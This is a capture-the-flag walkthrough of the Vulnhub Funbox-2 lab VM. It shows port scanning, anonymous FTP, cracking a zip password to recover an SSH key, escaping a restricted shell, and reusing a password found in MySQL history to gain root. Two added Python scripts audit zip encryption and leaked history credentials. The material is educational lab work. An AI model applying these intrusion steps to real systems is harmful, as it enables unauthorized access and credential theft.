Vulnhub: Funbox-2

This is the second box in the Funbox series from Vulnhub, a great series for beginners: it has all the classic boot2root services.

Looking back, I really didn’t explain my steps here at all, yikes!

Scanning

crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Nmap scan report for 192.168.56.117
Host is up (0.000086s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Focused Scan:

crazyeights@es-base:~$ nmap -A -p- 192.168.56.117

Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration

Nothing on web server:

crazyeights@es-base:~$ dirb http://192.168.56.117

---- Scanning URL: http://192.168.56.117/ ----
+ http://192.168.56.117/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.117/robots.txt (CODE:200|SIZE:17)
+ http://192.168.56.117/server-status (CODE:403|SIZE:279)

The disallowed entry (/logs/) in robots.txt doesn't exist.

Checking out FTP:

Anonymous login:

crazyeights@es-base:~$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.117]
Name (192.168.56.117:crazyeights): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.56.1 !
230-
230-The local time is: Sun Oct 11 17:11:47 2020
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.

Downloading anna.zip:

local: anna.zip remote: anna.zip
200 PORT command successful
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
226 Transfer complete

The archive is password protected. We can use zip2john to extract a crackable hash from the zip file, then run john against it.

crazyeights@es-base:~$ zip2john anna.zip > anna_hash.txt

Cracking the hash:

crazyeights@es-base:~$ john --wordlist=lists/rockyou.txt --rules anna_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:47 DONE (2020-10-11 13:18) 0g/s 4869Kp/s 4869Kc/s 4869KC/s Bubbydoding..Aaaaaaaaaaaaing
Session completed

Didn’t get it. It is likely a rabbit hole.
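As an added example (not part of the original writeup): john reported the archive as a PKZIP hash, meaning the legacy ZipCrypto scheme, which it guesses at millions of candidates per second as seen above. This small audit script walks a zip's local file headers and reports which entries still rely on ZipCrypto versus WinZip AES or no encryption at all; the sample archive bytes and file names are constructed inline.

```python
import struct

LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")  # local file header, 30-byte fixed part
LOCAL_SIG = b"PK\x03\x04"
FLAG_ENCRYPTED = 0x0001
METHOD_AES = 99               # WinZip AE-x marker; details live in extra field 0x9901
AES_EXTRA_ID = 0x9901
AES_STRENGTH = {1: "aes-128", 2: "aes-192", 3: "aes-256"}

def _aes_strength(extra):
    """Extra field = repeated [id(2) size(2) body]; AES body = vendor ver(2) 'AE'(2) strength(1) method(2)."""
    i = 0
    while i + 4 <= len(extra):
        fid, size = struct.unpack_from("<HH", extra, i)
        if fid == AES_EXTRA_ID and size >= 5:
            return AES_STRENGTH.get(extra[i + 8], "aes-unknown")
        i += 4 + size
    return "aes-unknown"

def classify_entries(data):
    """Walk local headers; return (name, scheme) with scheme 'none', 'zipcrypto' (PKZIP) or 'aes-NNN'."""
    out, pos = [], 0
    while data.startswith(LOCAL_SIG, pos):
        (_sig, _ver, flags, method, _time, _date, _crc, csize, _usize,
         nlen, xlen) = LOCAL_HDR.unpack_from(data, pos)
        pos += LOCAL_HDR.size
        name = data[pos:pos + nlen].decode("utf-8", "replace")
        extra = data[pos + nlen:pos + nlen + xlen]
        pos += nlen + xlen + csize   # skip file data (samples set no data-descriptor flag)
        if not flags & FLAG_ENCRYPTED:
            scheme = "none"
        elif method == METHOD_AES:
            scheme = _aes_strength(extra)
        else:
            scheme = "zipcrypto"      # legacy stream cipher: the "PKZIP" hash john loaded
        out.append((name, scheme))
    return out

def make_local_entry(name, flags, method, extra=b"", payload=b""):
    """Build one local header + data for a constructed sample (no central directory needed here)."""
    hdr = LOCAL_HDR.pack(LOCAL_SIG, 20, flags, method, 0, 0, 0,
                         len(payload), len(payload), len(name), len(extra))
    return hdr + name.encode() + extra + payload

# Constructed sample archive: a ZipCrypto entry, an AES-256 entry and a plain entry.
AES256_EXTRA = struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", 3, 8)
CONSTRUCTED_ARCHIVE = (make_local_entry("id_rsa", FLAG_ENCRYPTED, 8, payload=b"\x00" * 12)
    + make_local_entry("notes.txt", FLAG_ENCRYPTED, METHOD_AES, AES256_EXTRA, b"\x00" * 12)
    + make_local_entry("welcome.msg", 0, 0, payload=b"plain"))
```

Any entry reported as zipcrypto should be treated as protected only by the strength of its password, since the cipher itself adds no slowdown for a guessing attack.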

Trying tom.zip next, because it is the only entry that isn't writable:

-r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip

Download tom.zip:

ftp> get tom.zip
local: tom.zip remote: tom.zip
200 PORT command successful
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
226 Transfer complete
1477 bytes received in 0.04 secs (39.8768 kB/s)

Getting the hash:

crazyeights@es-base:~$ zip2john tom.zip > tom_hash.txt

Cracking the hash:

crazyeights@es-base:~$ john --wordlist=lists/rockyou.txt --rules tom_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)
1g 0:00:00:01 DONE (2020-10-11 16:28) 0.9009g/s 29520p/s 29520c/s 29520C/s 123456..dyesebel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
crazyeights@es-base:~$ 

Extracting the archive gives us id_rsa, an SSH private key, which may let us log in over SSH without a password:

50333540 -rw------- 1 crazyeights crazyeights 1675 Jul 25 06:42 id_rsa

Logging in to ssh:

crazyeights@es-base:~$ ssh -i id_rsa tom@192.168.56.117
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
Last login: Sun Oct 11 20:33:26 2020 from 192.168.56.1
tom@funbox2:~$ 

We land in a restricted shell (rbash), so the first step is to break out of it.

Escaping rbash (PATH still includes /bin, so spawning an unrestricted bash is enough):

tom@funbox2:~$ cd /var/www/html
-rbash: cd: restricted
tom@funbox2:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
tom@funbox2:~$ bash -i
tom@funbox2:~$ cd /var/www/html

Poking around:

Nothing else on the web server:

tom@funbox2:~$ cd /var/www/html
tom@funbox2:/var/www/html$ ls
index.html  robots.txt

No other users:

tom@funbox2:/home$ ls
tom

Checking out ~/.mysql_history (the \040 sequences are octal escapes for spaces in the libedit history format):

_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit

You can see what might be a password on the line insert into support (tom, xx11yy22!):

tom:xx11yy22!
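As an added example (not part of the original writeup): a small auditor that decodes a libedit-format history file like the one above and flags entries that probably leak a credential, either through a keyword (IDENTIFIED BY / PASSWORD) or through a password-like literal such as the ad-hoc insert on this box. The sample history is constructed inline from the lines shown above plus one CREATE USER statement made up here.

```python
import re

HISTORY_MAGIC = "_HiStOrY_V2_"
_ESCAPE = re.compile(r"\\(?:([0-7]{3})|(\\))")   # \ooo octal escape or escaped backslash
KEYWORD = re.compile(r"\b(identified\s+by|password)\b", re.I)
TOKEN = re.compile(r"[^\s(),;'\"]+")

def decode_history(text):
    r"""Turn a libedit history file (what the mysql client writes) back into plain
    statements: \040 becomes a space, \\ becomes a single backslash."""
    lines = text.splitlines()
    if lines and lines[0] == HISTORY_MAGIC:
        lines = lines[1:]
    def unescape(m):
        return chr(int(m.group(1), 8)) if m.group(1) else "\\"
    return [_ESCAPE.sub(unescape, ln) for ln in lines if ln.strip()]

def looks_like_secret(token):
    """Heuristic: a mixed letter/digit token of 8+ characters is worth a look."""
    return (len(token) >= 8 and any(c.isdigit() for c in token)
            and any(c.isalpha() for c in token))

def find_leaked_credentials(text):
    """Return (decoded statement, reason) for entries that likely carry a secret:
    a credential keyword first, otherwise the first password-like literal."""
    hits = []
    for stmt in decode_history(text):
        kw = KEYWORD.search(stmt)
        if kw:
            hits.append((stmt, "keyword: " + " ".join(kw.group(1).lower().split())))
            continue
        for tok in TOKEN.findall(stmt):
            if looks_like_secret(tok):
                hits.append((stmt, "password-like token: " + tok))
                break
    return hits

# Constructed sample: lines recovered from tom's ~/.mysql_history plus one
# CREATE USER statement added here to exercise the keyword rule.
SAMPLE_HISTORY = "\n".join([
    "_HiStOrY_V2_",
    "show\\040databases;",
    "create\\040database\\040support;",
    "insert\\040into\\040support\\040(tom,\\040xx11yy22!);",
    "create\\040user\\040'app'@'localhost'\\040identified\\040by\\040'Winter2020';",
    "quit",
])
```

Running find_leaked_credentials over real history files in a fleet is a cheap way to catch exactly the kind of reuse that hands out sudo here.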

Logging into mysql server:

tom@funbox2:~$ mysql -u tom -p'xx11yy22!'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.30-0ubuntu0.18.04.1 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
[SNIP] - NOTHING INTERESTING

Reusing the MySQL password as tom's local password:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL

Getting the root flag:

tom@funbox2:~$ sudo su
root@funbox2:/home/tom# 
root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt
root@funbox2:~# cat flag.txt 
   ____  __  __   _  __   ___   ____    _  __             ___ 
  / __/ / / / /  / |/ /  / _ ) / __ \  | |/_/            |_  |
 / _/  / /_/ /  /    /  / _  |/ /_/ / _>  <             / __/ 
/_/    \____/  /_/|_/  /____/ \____/ /_/|_|       __   /____/ 
           ____ ___  ___  / /_ ___  ___/ /       / /          
 _  _  _  / __// _ \/ _ \/ __// -_)/ _  /       /_/           
(_)(_)(_)/_/   \___/\___/\__/ \__/ \_,_/       (_)            
                                                              
from @0815R2d2 with ♥
root@funbox2:~# 

FIN.